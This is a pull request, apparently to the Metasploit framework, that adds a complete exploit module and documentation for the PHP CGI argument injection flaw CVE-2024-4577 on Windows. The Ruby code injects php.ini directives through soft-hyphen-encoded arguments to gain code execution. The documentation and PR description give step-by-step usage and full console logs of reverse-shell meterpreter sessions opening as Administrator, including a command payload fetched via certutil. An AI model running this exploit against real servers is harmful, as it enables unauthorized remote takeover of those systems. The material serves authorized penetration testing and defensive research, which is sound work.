### PR TITLE
Add exploit module for the new PHP CGI Argument Injection vuln (CVE-2024-4577)

### DIFF
--- a/documentation/modules/exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.md
+++ b/documentation/modules/exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.md
@@ -1,0 +1,200 @@
+## Vulnerable Application
+This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
+on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
+the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
+character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
+the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
+and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
+
+XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
+an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.
+
+## Testing
+* Configure a Windows system with a system locale for Japanese (code page 932).
+  * Navigate to `Control Panel` -> `Region` -> `Administrative` -> `Change system locale...`
+  * Select `Japanese (Japan)` and click `OK`.
+  * Click `Restart now`.
+  * After restart, login and open a command prompt. Verify the code page via the command `chcp`. You should see this:
+```
+Microsoft Windows [Version 10.0.20348.1607]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>chcp
+Active code page: 932
+```
+* Download a known vulnerable version of XAMPP `8.2.12 / PHP 8.2.12`
+([direct link here](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe)).
+* Install XAMPP and run the XAMPP Console. Click the `Start` action to start the Apache web server.
+* Verify you can browse to http://127.0.0.1:80/. You should see the "Welcome to XAMPP for Windows" page.
+
+No further configuration is needed to exploit the target when targeting the exploits default `TARGETURI` endpoint
+`/php-cgi/php-cgi.exe'`. This is because XAMPP uses the Apache `ScriptAlias` directive to expose the `php-cgi.exe`
+binary directly. If you want to target an `.php` endpoint (for example `/index.php`), the target Apache serer must
+have this enabled in its configuration (`c:\xampp\apache\conf\extra\httpd-xampp.conf`):
+
+```
+ #
+ # PHP-CGI setup
+ #
+ <FilesMatch "\.php$">
+     SetHandler application/x-httpd-php-cgi
+ </FilesMatch>
+ <IfModule actions_module>
+     Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
+ </IfModule>
+```
+
+If you modify the Apache config, dont forget to restart the Apache server to pick up the changes.
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the command payloads. This is not needed for the PHP payloads
+as they execute in-memory.
+
+1. Start msfconsole
+2. `use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set payload php/meterpreter/reverse_tcp`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Windows PHP
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set RHOSTS 192.168.86.50
+RHOSTS => 192.168.86.50
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 0
+target => 0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (39927 bytes) to 192.168.86.50
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49761) at 2024-06-10 17:32:52 +0100
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer    : WIN-V28QNSO2H05
+OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
+Meterpreter : php/windows
+meterpreter > 
+```
+
+### Windows Command
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 1
+target => 1
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ZyJgsNjYvpTX     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (201798 bytes) to 192.168.86.50
+[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49780) at 2024-06-10 17:34:45 +0100
+
+meterpreter > getuid
+Server username: WIN-V28QNSO2H05\Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : ja_JP
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```

--- a/documentation/modules/exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.md
+++ b/documentation/modules/exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.md
@@ -2,7 +2,7 @@
 This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
 on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
 the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
-character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
+character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose
 the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
 and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
 

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -1,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PHP CGI Argument Injection Remote Code Execution',
+        'Description' => %q{
+          This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
+          on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
+          the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
+          character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
+          the PBP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
+          and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Orange Tsai', # Original finder
+          'watchTowr', # Original PoC
+          'sfewer-r7' # Metasploit exploit
+        ],
+        'References' => [
+          ['CVE', '2024-4577'],
+          ['URL', 'https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/'],
+          ['URL', 'https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/'],
+          ['URL', 'https://github.com/W01fh4cker/CVE-2024-4577-RCE'],
+        ],
+        'DisclosureDate' => '2024-06-06',
+        'Platform' => ['php', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            # Tested with the payload: php/meterpreter/reverse_tcp
+            'Windows PHP', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ],
+          [
+            # Tested with the payload: cmd/windows/http/x64/meterpreter/reverse_tcp
+            'Windows Command', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Payload' => {
+                'BadChars' => '"'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 80
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # By default XAMPP in Windows is in a vulnerable configuration and the URI path /php-cgi/php-cgi.exe will
+        # be able to trigger the vulnerability, so long as the target system has its region set to a suitable locale
+        # that will perform the necessary Unicode best-fit character conversion.
+        # If the target is not XAMPP but it is vulnerable, the TARGETURI will need to be set to a suitable .php CGI script.
+        OptString.new('TARGETURI', [true, 'The path to a PHP CGI endpoint', '/php-cgi/php-cgi.exe']),
+      ]
+    )
+  end
+
+  def send_exploit_request_cgi(php_payload, allow_url_include = true)
+    php_content = "<?php #{php_payload}; die(); ?>"
+
+    vprint_status("PHP content: #{php_content}")
+
+    # The exploit https://github.com/W01fh4cker/CVE-2024-4577-RCE added several additional arguments
+    # which seems potentially useful and are included here too.
+    args = [
+      '-d suhosin.simulation=1', # Dis-arm Suhosin if it is present.
+      '-d disable_functions=""', # This directive allows you to disable certain functions
+      '-d open_basedir=', # open_basedir, if set, limits all file operations to the defined directory and below.
+      '-d auto_prepend_file=php://input', # Automatically add files before PHP document.
+      '-d cgi.force_redirect=0', # cgi.force_redirect prevents anyone from calling PHP directly with a URL
+      '-d cgi.redirect_status_env=0',
+      # To debug your payloads you can add this:
+      # '-d log_errors=On',
+      # '-d error_log=php_errors_log',
+      '-n' # No configuration (ini) files will be used
+    ]
+
+    # We add this by default as it is required for exploitation, however the check routine can leverage an error
+    # message if this setting is note defined, which allows us to detect vulnerable versions.
+    args << '-d allow_url_include=1' if allow_url_include # Whether to allow include/require to open URLs (like https:// or ftp://) as files.
+
+    query = args.shuffle.join(' ')
+
+    query = CGI.escape(query).gsub('-', '%AD')
+
+    vprint_status("Query: #{query}")
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path),
+      'encode_params' => false,
+      'vars_get' => {
+        query => nil
+      },
+      'data' => php_content
+    )
+  end
+
+  def check
+    res = send_exploit_request_cgi('', false)
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    if res.code == 200 && (res.body.include? '\'php://input\'')
+      return CheckCode::Vulnerable(res.headers['Server'])
+    end
+
+    CheckCode::Safe('Ensure TARGETURI is set to a valid PHP CGI endpoint.')
+  end
+
+  def exploit
+    if target['Arch'] == ARCH_CMD
+      php_bootstrap = []
+
+      if payload.encoded.include? '%TEMP%'
+        var_cmd = "$#{Rex::Text.rand_text_alpha(8)}"
+
+        php_bootstrap << "#{var_cmd} = \"#{payload.encoded}\""
+
+        php_bootstrap << "#{var_cmd} = str_replace('%TEMP%', sys_get_temp_dir(), #{var_cmd})"
+      end
+
+      php_bootstrap << "system(#{var_cmd})"
+
+      php_payload = php_bootstrap.join(';')
+    else
+      php_payload = payload.encoded
+    end
+
+    send_exploit_request_cgi(php_payload)
+  end
+end

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -19,8 +19,11 @@ class MetasploitModule < Msf::Exploit::Remote
           on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
           the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
           character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
-          the PBP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
+          the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
           and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
+
+          XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
+          an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def send_exploit_request_cgi(php_payload, allow_url_include = true)
+  def send_exploit_request_cgi(php_payload, allow_url_include: true)
     php_content = "<?php #{php_payload}; die(); ?>"
 
     vprint_status("PHP content: #{php_content}")
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_exploit_request_cgi('', false)
+    res = send_exploit_request_cgi('', allow_url_include: false)
 
     return CheckCode::Unknown('Connection failed') unless res
 

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
           on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
           the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
-          character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
+          character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose
           the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
           and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
 

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -31,8 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2024-4577'],
           ['URL', 'https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/'],
-          ['URL', 'https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/'],
-          ['URL', 'https://github.com/W01fh4cker/CVE-2024-4577-RCE'],
+          ['URL', 'https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/']
         ],
         'DisclosureDate' => '2024-06-06',
         'Platform' => ['php', 'win'],
@@ -86,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("PHP content: #{php_content}")
 
     # The exploit https://github.com/W01fh4cker/CVE-2024-4577-RCE added several additional arguments
-    # which seems potentially useful and are included here too.
+    # which seems potentially useful and are included here too. Note, this link is now dead.
     args = [
       '-d suhosin.simulation=1', # Dis-arm Suhosin if it is present.
       '-d disable_functions=""', # This directive allows you to disable certain functions

--- a/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
+++ b/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ]
 
     # We add this by default as it is required for exploitation, however the check routine can leverage an error
-    # message if this setting is note defined, which allows us to detect vulnerable versions.
+    # message if this setting is not defined, which allows us to detect vulnerable versions.
     args << '-d allow_url_include=1' if allow_url_include # Whether to allow include/require to open URLs (like https:// or ftp://) as files.
 
     query = args.shuffle.join(' ')


### PR DESCRIPTION
The (draft) pull request adds an exploit module for the new PHP CGI argument injection vulnerability disclosed yesterday. H/t to Orange Tsai who found the vuln (see [the Devcore disclosure](https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/)), and watchTowr for their [analysis](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/).

## To-Do
* More testing on different configurations (I have only tested XAMPP in a Japanese locale)
* Documentation

## Testing

I configured a Windows Server 2022 system with the Japanese locale (Code page 932). As  [XAMPP](https://www.apachefriends.org/download.html) is known to be vulnerable in a default configuration, I installed XAMPP  `8.2.12 / PHP 8.2.12` ([direct download link here](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe)).

The exploit supports both PHP payloads (`ARCH_PHP`) and command payloads (`ARCH_CMD`). Note, for testing the `ARCH_CMD` payloads you may need to disable Defender if you are dropping a stock Meterpreter.

## Example: Windows PHP Payload

```
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows PHP



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (39927 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49991) at 2024-06-07 15:31:53 +0100

meterpreter > getuid
Server username: Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer    : WIN-V28QNSO2H05
OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
Meterpreter : php/windows
meterpreter > 
```

## Example: Windows Command Payload

```
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      EmrOsqzs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (201798 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49994) at 2024-06-07 15:33:10 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```